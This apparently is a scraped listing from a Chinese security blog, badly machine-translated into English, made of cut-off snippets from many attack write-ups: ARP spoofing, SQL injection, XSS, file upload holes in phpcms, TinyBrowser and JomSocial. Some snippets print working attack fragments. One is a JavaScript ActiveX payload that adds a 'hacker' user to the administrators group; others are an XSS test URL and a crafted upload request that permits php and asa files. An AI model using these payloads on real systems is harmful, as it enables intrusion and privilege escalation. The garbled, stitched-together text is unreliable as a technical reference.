Cloud Security

I. arp Communication Protocol processBecause the lan network flow is not carried out by IP address, but by MAC address, the computer recognizes a Machine Based on mac. To send A packet to host B in region A, the local ARP cache table is queried.

The following are some tests on common cain tools used by hackers. Please take precautionsEnable sniffing first Select the NIC to sniff Scan the MAC addresses of all hosts on the CIDR Block Go to the APR page, add the host address for ARP

Recently, there have been emergency response work almost every day. I wrote a linux webshell to scan and kill small scripts. If there are too many website files and the packages are too large, I can use this script to check and kill them, then find

Cosine Function I have seen several articles written in foreign countries. I still have a Paper. I forgot where to put it.And then see the ghost: http://www.bkjia.com/Article/201003/45234.htmlMr_xhming of:

Page Test with input boxFor non-Rich Text, enter special characters in the input box submitOn the submitted page, check the source code. Based on the keyword tiehua, check whether the 'Before and After tiehua in the source code has been converted

H4ckx7s Blog By accident, a php station was passing by. Because I seldom studied PHP, I looked at phpaaCMS rather than a large CMS, and habitually added "" to the back. I did not expect an error! You have an error in your SQL syntax; check the

Test method: The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! ######################################## ############################## PHP 5.3.0 getopt () Denial

BY hAcKjAm First, let's look at the Code: cnhackerx@163.com   Key: Var shell = new ActiveXObject ("wscript. shell ");Shell. Run ("net user hacker/add & net localgroup administrators hacker/add", 1 ); // Register wscript. shell as ActiveX, and

By: SuperHei · Lilo It may be that with the development of network security technology, the quality of administrators is improving. When using the access + asp system, the mdb is changed to asp or asa for non-database downloads. If you do not

Test method: The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! **************************************** ********************** TinyBrowser Remote File upload

From ghost son s Blog Open the new station and release it. In the past, the packages should be written in summary. There were not a few people before and after, which is a pseudo-private version.#! /Usr/bin/env python# For God sake, Keep it

// Use MySQL to expose fields with errorsMysql> SELECT * FROM (SELECT * FROM user a join user B) C;ERROR 1060 (42S21): Duplicate column name HostMysql> SELECT * FROM (SELECT * FROM user a join user B USING (Host) C;ERROR 1060 (42S21): Duplicate

Someone posted this vulnerability on the Phantom brigade today: Html> http://xeyeteam.appspot.com/2010/07/22/renren-wap-authentication-token-steal.html This vulnerability is actually mentioned on my blog. See this for details: Http://riusksk.blogbus.

A chart is displayed in a foreigner's article, so Mysql + Asp. Net injection supports multiple statements. Really? A bit unconvinced. I tested it: Protected void Page_Load (object sender, EventArgs e){Try{Response. Write ("using Mysql. Data.

Local test successful Analysis Code: /* Save the uploaded image file to the default path */$ Default_path = ../tmp directory, upload, image /;/* Check whether the $ default_path variable exists */If (! File_exists ($ default_path ))/* Make the

Baidu video uses a flash directly to call the js function, but the filtering is not strict, resulting in a cross-site vulnerability. The test URL is:Http://list.video.baidu.com/r/video/static/swf/amuse_index.swf? FuncGetData = alert (document.

PhpYun's talent system is an open-source talent system launched by php's industry-renowned portal php100. Due to its position in the industry, php100 is quickly selected by webmasters, but it is a new thing after all, its code has serious security

I recommend double clicking the video and watching it in full screen so its somewhat legible. This video walks through an example of attacking a windows domain. This post also contains a textual walk through. V. Get administrator rights on a

Affected Versions:JomSocial Joomla! Is an Open Source Content Management System (CMS ). Joomla! A design vulnerability exists in the implementation of the JomSocialy component. Remote attackers may exploit this vulnerability to upload arbitrary

Registered Member, visit:Http: // 192.168.1.110/phpcms/inde... Wfupload & args = 1, php | asa | cer | png | bmp, 1, 0 & module = content & catid = 6Stunned, scared. It's a magic horse, it's a float cloud!Look at the code again: $ savefile =